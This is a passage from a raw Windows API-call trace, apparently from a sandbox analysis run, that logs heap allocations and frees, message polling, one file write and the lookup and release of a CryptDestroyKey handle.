| out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0254.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0254.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0254.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0254.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0254.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0254.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0254.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3a330 | out: hHeap=0x970000) returned 1 [0254.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0254.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0254.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0254.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0254.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea5640 | out: hHeap=0x970000) returned 1 [0254.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0254.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0254.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0254.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0254.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0254.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0254.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0254.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0254.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0254.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0254.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0254.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0254.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0254.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0254.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0254.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0254.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0254.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f271a0 | out: hHeap=0x970000) returned 1 [0254.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0254.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0254.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13188) returned 0x2ecb960 [0254.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eb87d0 | out: hHeap=0x970000) returned 1 [0254.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0254.361] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0254.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0254.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0254.361] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0254.361] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0254.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0254.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0254.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0254.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0254.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0254.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0254.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13188) returned 0x2edeaf0 [0254.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0254.363] WriteFile (in: hFile=0x2d0, lpBuffer=0x2edeaf0*, nNumberOfBytesToWrite=0x13188, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2edeaf0*, lpNumberOfBytesWritten=0x8cf5e4*=0x13188, lpOverlapped=0x0) returned 1 [0254.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0254.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2edeaf0 | out: hHeap=0x970000) returned 1 [0254.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0254.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0254.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0254.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0254.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0254.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0254.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0254.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0254.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0254.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0254.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0254.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0254.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0254.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0254.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0254.369] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0254.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0254.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f88 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0254.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0254.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0254.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0254.370] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0254.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0254.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0254.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0254.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0254.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0254.371] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0254.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0254.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0254.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0254.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0254.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0254.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0254.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0254.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0254.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0254.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0254.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0254.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0254.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0254.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0254.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0254.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0254.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0254.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0254.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0254.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0254.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0254.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0254.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51748, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0254.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0254.373] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0254.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0254.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0254.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0254.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0254.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0254.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0254.373] CryptDestroyKey (hKey=0xa876d0) returned 1 [0254.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0254.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0254.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0254.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0254.374] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0254.374] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0254.374] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0254.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0254.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0254.374] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0254.374] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0254.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55fb8 | out: hHeap=0x970000) returned 1 [0254.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.374] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0254.374] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0254.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0254.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0254.374] PeekMessageW (in: lpMsg=0x8cf140, 